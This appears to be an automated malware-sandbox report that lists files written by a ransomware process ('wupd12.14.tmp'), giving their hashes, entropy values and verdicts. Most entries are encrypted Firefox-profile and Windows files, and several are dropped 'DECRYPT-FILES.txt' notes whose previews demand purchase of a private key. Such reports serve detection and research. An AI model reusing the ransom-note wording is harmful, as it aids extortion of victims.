Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-ms Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	528
Entropy (8bit):	7.488451462698467
Encrypted:	false
MD5:	FB6ADE8862E98C02FFEED9EC6D97AB2F
SHA1:	611C602A81E6217CC197A2A9568ED74E22FBB607
SHA-256:	A520C29B23C88F1CB680CD482A2746208A871FDF27D4161B522959C2B6B2C0F0
SHA-512:	DD3F3A77A58BC4C135DD10DA5E9DAC3CD009285942D989A2D475165358850F260B128A20F923F2B8DE7ED18E13F19134AB9101B06FBACED3FEE038E6DD0BC9D2
Malicious:	false
Preview:	..U.G.....>..\[....#..D0r..L...$.}Th...~..i.v]R..~..iT&nj..&.;T..HW...\....;....]...+...P...S..Y.-.Px..6.GOm...}r..]...PhT{...........)..P8)..Ix...f.:.\|.6.v.........u.4.....j....X..IQ.5.:..x.}...\..k...%?..EGC.h. .5VW....m..>.NX.I7..........f.afa..[f.CWN...1w._.*.(.Pr.qxL...<.twfK..N.D4tu..f..K.8+Q...J....9.dL.K.-~$w...M.@/..y.)2.5.z......0JS@....N..3.].v......).9..R...4.z....z.\|.}l..y..I7MU...\|..X...7..ME-...DH..]..tU...0E.uW.....y.z..gA.5.p.y.f......&..nm.....E.y.H.pf]../...[.....o.I....f.af

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	27564
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	7966C0CAE2D823E43C051E24E23DEC2F
SHA1:	A0C7A3D2D8EB7B4E7D74559B40EACB1479930DBE
SHA-256:	51F671A263C07E416A15677E93086CDF1BE65BB94D7A3E2532D1EFF68AC4B592
SHA-512:	1EC29B8D50711281A3008D3EF0FF96DEA7E78ADF00DB8F87DCD5C27BAA1C22CCA439A0167FA23DF75E1296D8B0BFE4512413956357EAF33EC2F6058D02A8324F
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	792
Entropy (8bit):	7.715182227039946
Encrypted:	false
MD5:	DD8AD7DC81AED26A881DCB7453079B8B
SHA1:	A9E35364065583C3177F08D37A5D53D5AC27F359
SHA-256:	82436A5FE1DDE1C509B056D9080F394EC57C06121AA7860F4C4F33B54CA3018D
SHA-512:	13FC09B61ED0507F24EBDBDB4FD48752A442ED00BE0A6B0D78E95669819032A69569467F90FBAB325C3261BF115FAA7CF9B95A2FAF7A7F524676A9ADA9811EB1
Malicious:	false
Preview:	.v.^.L.....%$.... ...=.Z5.E....[,.....)k{......8^.......$....s. ..L`.?...m..$.......1X......+1-.w.W>7f...:...z..$..4..Z.@-,.C......(a.{9.(....y.D...b.f.......s:.`B.....\. ...#.3W.^A.........AQ.g_....b...eu..].. AHP....\t`.7..q..&L.hU.h..Y"T.%....f.afE.`..4&.2#g.3@:..!.x.L..!..?..W.d.p. ...OaFE.P...6........H}.IN...:.V..b..A.t...@s\1y5...NYn.o.S..L..d.................~\...i..g.#M...._Q_.u.od).A.......L..n...k...>.D....P[.....cybU........(.1.(.q.q..(u..L.`....L.....m-".ES.<..2..2.9.$._.;\|.C....f.af.n.)...V.....b..d4.-=..z..j"].....]J..h4..zc.....tZ${y.#.......W#...A."......h_.^.p?.?...D.!..o.Q.~.7.R.{@.o.g...#K.....~.........9..K.}N9.1.a.......\.X[.....Xf..db.R..p/..5._Y..7#..v/....N.j....J....?2.4..c...6....bK..Pb.a)j...t..k.@.....f.af

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	91880
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	B5B62CF021DEDC846DC9316E9DC59698
SHA1:	B6C1983E41EDC6274FD4B7ACD5036C246DC08421
SHA-256:	B8D32C603809D7DC5FEAFD3CDD099F8E7D20014962526D9F4DEF5856064DD405
SHA-512:	AE22D6ECA3B6EE29F8346CA8E98915E7B1CC655492BA60430E5852BF4170D47B491E935325378694D38ABF46B40785E601FE7114DD987984E2C7295D5537CA74
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.131145066164254
Encrypted:	false
MD5:	3CFA4FDEF861EB3B3A16051467CD1346
SHA1:	A8B9B8210BA1809D51EBD9B489CB22E5E7A86AD3
SHA-256:	154D2ED6F4447207FDB4DEE0BA0A2DEF293016DA76159482D28A005DC676C1E1
SHA-512:	F8E3F9248E54D49C68D528DCB695207F4D12DC48B3028890E43D0E953D69965D829588D7124EA606AE53DA33D1052FC5068A45F9C9FACDADC95263783CBAA8E0
Malicious:	false
Preview:	-."..Gcs$.=do..1.V@.N.XI;W..;..wG.GF.[........8...\|L..t......_.U.C.......$.9.....C......O8O/.}$'.H...\|....o.v..)~.."....Ld.XH.?'.I.....l..9...$..I...I.....9..r..%...^*b ...zo..A.o...\|...i!L.......m.t.Q..;t..Jc...6..b[......R_....F.;....u./..6.....f.af

C:\Users\user\AppData\Roaming\Microsoft\Word\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	64316
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	F34B7EDF1CCE9814DB579A1309515E57
SHA1:	0416006332156890BBCF834E204F78605B476531
SHA-256:	CA92983C40594E46CA05D995B3EE843400A982A565F51057DD8FA38A819A65D7
SHA-512:	A8C35249056B7961BCE06E6BD16510C6D6230D74A7D98FF288E22996B8A067416C56A9D6A31529D94E56766A84F609AB0845CDCB400679A66B4BA8989C24FD79
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20150305021524 Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	528
Entropy (8bit):	7.61721554777305
Encrypted:	false
MD5:	33B2AF7C7EF9D7AE96F86E13336B3CE0
SHA1:	114761E23B698B35E340BE24F567F26F8C1C7D52
SHA-256:	44B0B621911E6C2454E0AC8C2EBFE9DAE3CBD79231788C526D28FE47B563EF46
SHA-512:	49E0136E9824F2475FA4E80CBF945594D4311ACC8004D6A41F5EA81F53343D6C0ECA7E25925C1CCEBD1A6FFDAA3F06D036D9B22E150BA0764899679691578323
Malicious:	false
Preview:	.}-.@nL..O...3.C7.......Z...Q...=.\O......W.....P.R6..Jc>..p..<".0lJv.1.).+.$0\|/vA...U..v..'...9c.m.b....aW.x1Z..%h..E.....n.....n... ...]...G.".....S..".T..%.T.K.-..q<..h....6...d.....b.[fX...kFMQ.p..V_.....O..M..'z.d.q..F.Si....~.....B....f.af.&...h..[AFy&..fp8..H.e.j.;jOq..aH..X.......(;..^.J..sd^@hM).v...B...2........>d. Z)x.B...j..&....M.C...a.cP...&.NA...[zx..........Jw...T].E.^.k....r-[.z.nw"t.....$..>../.l.).cX.".._y.3..X....Y.......Q.oE...l..:.dT..b....S/4L_..K... ..@.S.)....f.af

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\addons.json Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	528
Entropy (8bit):	7.585976170672401
Encrypted:	false
MD5:	AAD79828BCF4756A8AE05914B67CE850
SHA1:	AC949720AF5127E59326DE32CFEB134CDE04C356
SHA-256:	5A3B6C38E04F22B2670C69CFDAA6B3121575E805437B5BBAA9ADDB7D6168B020
SHA-512:	EFF95AD68E3267C35A762D00D044FF6FD21368BA065AEC69905F9E67C28EA5DDBB37A01357FCAB58FBF5479D3E61BF484BEE85CEE28DDAE68EA189807941EA14
Malicious:	true
Preview:	..#h....7.!..`;ZuJ4.US....E......IXuy...\.2Y..........v..<....R.....g\|6fF.x....H4..Z].y.:_....S73...XL.:..!....Z.T..WWX.../{....D......Le..QZ8.7f.Q..t\|......?..UD..5...oT.n......\|......yQ~$....s..C....\|..\.(......X..o\|..,8u.A...].g.P..;L......f.af....}<v.)n.WP.#..Y.t...l..v....`9.))N^.Q8...9'.9r.E{2..~.A<$I.gq(.n.S.....+.Zi......<mj...\|.....1.,l....Q..7/.r.w.X.(...a.\|....&...$...i7..T.e........).h..$.W$.8_Z.....K..s..u. ..b.j....\|..B..}G .;S.6..`s2.V.p..........E....].R..=7...W>.Q..CbC....f.af

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\bookmarkbackups\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	true
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1320
Entropy (8bit):	7.836186396925327
Encrypted:	false
MD5:	9410EA60EB1A7757404369AF3F3F7DA0
SHA1:	A8022C701FCE6904BB23EC6EEE163ABE7A7AB9BF
SHA-256:	643B4F3C767CAA13762087F180BE29315F99F277290767CBB5C403245D1FE99F
SHA-512:	62D176385A2785FEDE1C8545D7E0EAD061908380F07F07CB9E83D38A7EEB442ACB564ABCFD151900B52D7C4AA87185E5B5109DF90F99CF11B97D481E79C61C2F
Malicious:	true
Preview:	...?....s........:@..3Yv.{..........,0%?.u@..WK..o.%.....B..`./.l...u.s..J?.....g\..Y..S=v.^}....F....!M.I.`.T.'.Y.D...D.{}mT.rt/...`..Sj..a..7...jS......~N..$..ZD.A..7\..lr..9\|.t<s%Q S....b..A.....d......r.5.%......f(...o..<Q[.).}...n;..E a/.S....f.af.5..6.l....l..C.....;.RK... G.x.....&"<0.M...aP..7...%...y%8.k..........(..M.-./.Ymz.Y........I...~rp.....u....._N..;..V..'..o<.......-WR..T6. .t.F..'..Sz.:%.w.G...1..S.n.,...VA..K......!.XuE.........!...&gB3......A....y..bZ.....o.4.....1,..G.....f.af+..."O..c...K).D.(....sG:O...}.c!.......=H..L,?.Z._..g.....G...9D....#......<2......Ly.S.. 5P..+h!\|.R..S......".R.=E.Y.<.%4...y..F..............<D/...{.u.. .LS....k.?#.....kY..}.6.....Zd.Z9.0-.....aw.2.e>>..LH.Z....,.....82p..'f(.l\..^J.Y.....f.af.w.l..{....LTR....."V.~....@.H`...L.)(q/..PSu`O..>5..\3...%.32~..C...:.....PV..}>.....hQ?~.=..@V....mZ.........'#...>Q...v.D.q.`_.L\.o..GSR..=....FJ\.c.X.7&.{l._h.m.b..e.[...[.E-.=..'o.n.CX.S......:.O

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	18376
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	17C90D15AE0F70CEB0500DC1677C0638
SHA1:	0F645ECE404416F3152689E94539178C658E583F
SHA-256:	7160B9035F4E47A92C4608C45541FB42D07FAD13BB8F4EC07B466DE7694BC11C
SHA-512:	719BC7E235B7901B2D28485A9D9396BF0F787DF34DD667CD7A84F63F8048EF12EBB5EDF2AD5775320B54C1E2515F131359C049AE2509EE510774DE84F03C4008
Malicious:	true
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\store.json.mozlz4 Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.127370587291715
Encrypted:	false
MD5:	567D7C0A1DF273FAA266DED88F6F81AE
SHA1:	89B8C91870648516B944698FC9E16827EB92F3FD
SHA-256:	B5472B1A3F4D691D732BF008872A3F14159138F2B1B0504496BA7A10CD9FCA88
SHA-512:	F6BA525BF6CBA0B57B724722B8174CEDA9EBFC3C5B789A793B4A0E0EA5C70EA953BFE61C1C5575C3C251661B0147811C324ADA1CA5F0390C52E7CE4C3C20B4B9
Malicious:	true
Preview:	..pj..&e.5@.)...Ho[.#'3.qE.j.]....%3G..A+....X.1.y....q...]..O.S..]..]...YV.:.Z.....BHU..2..tBj.i.......<U...5.J...!.P..r.aN..m..%Z.....q...c..`.^..)qJ.-?.J..._]..Q9S..Mg.....2ZH......"...l9.[..?.':...r'N... ..b......H:.!3...p.B.5...#e.;.....W....f.af

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	27564
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	7966C0CAE2D823E43C051E24E23DEC2F
SHA1:	A0C7A3D2D8EB7B4E7D74559B40EACB1479930DBE
SHA-256:	51F671A263C07E416A15677E93086CDF1BE65BB94D7A3E2532D1EFF68AC4B592
SHA-512:	1EC29B8D50711281A3008D3EF0FF96DEA7E78ADF00DB8F87DCD5C27BAA1C22CCA439A0167FA23DF75E1296D8B0BFE4512413956357EAF33EC2F6058D02A8324F
Malicious:	true
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\1482239458107.804b5b8e-3057-4315-ada7-6389f240c010.main.jsonlz4 Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	2112
Entropy (8bit):	7.877477056584442
Encrypted:	false
MD5:	67032A0181045E6790985A20C3537B50
SHA1:	D653D2B2A9E788B68703EE82763E743CA931C6D0
SHA-256:	4A09D723FEE06CDE3CBB95410C9EC616909E10BE3C0DD2A5153A27FD8894DDAC
SHA-512:	0DF1ED5A95742544DE451F54648B35B4DEF6C4B5F0716FFC9F591F55B7117F202734598CDCFAAF47758B823508DEC8108C1F7BFF53522EB445B10D77A20D6D09
Malicious:	true
Preview:	V...X.6:........_..........}.P..:y..?..i...?............y..m.;.:.$..="h0!.Z.J......R.&.yw.......r.\.7y....bO..........Vb&..u....k..#....1$.]#....J....fr.!<..@.h...Z.R.^AU.....o.^9.....2I....oY.W.?.$._P...hlW&.=.Hi.t.uP..!.U`..am..1...d.c........f.afW...92..-Li.o......4..A.S..U:yNE.z..c..@...LGl..w.uM..$vIR..2...?#.Y":.9......... ....f.^n .`.]\|....MCGB.].........sn.......O..G..[.k..ii.}z.....M....b..C...1\..E..........lz.KV....q.2....w..*_.s.D...Wl.3..#J..Z....0...as.<.'..Ke..Q[4.9..(.@....f.af).(....o%y.b.8q.f.j..2...].....G..4i......+A.e.o..."d..../T..@..7...1z..6l.}c.\|.`H.....~e].."./b...^"..=d..S..}.S.g..t.....z;Z....2d.&F..R...%.%.:CY.mNp..,j.._..n..%....Tk.."H.$nt.D.oU...r..gO?..<\|c.=..Q$~...J..Q.NdmA......(+..{b..3F..L0l....f.afe.$.P...nc..z.y.g.&.[......aN.jO.U........9...}3..N......>H..W..-.x...........\....+l.6...........-...FQ...Z..Zv.p\. .o...C?"..yg..gC>o....r`..\aI..........q.jW...K.2..y.......M..S.4..47... .hv.K...

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\eme-adobe.info Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	528
Entropy (8bit):	7.596740705512526
Encrypted:	false
MD5:	4DE8CB7869536282EB2D6CB1A0A0CB48
SHA1:	F6845F8A749688E614415A5E51207384967B65FE
SHA-256:	EEB415360D516A285F232883D80CC7F71052288C10BF4F47CC5708DC0EE9201C
SHA-512:	9F4CBFD146B021BA8AB79638CC59BD1499DA6AF1CA539D9E5C49809F2DE377896378291C739AB372069487FCF481A35BA8909C98998C7937019895AE7DA45D62
Malicious:	true
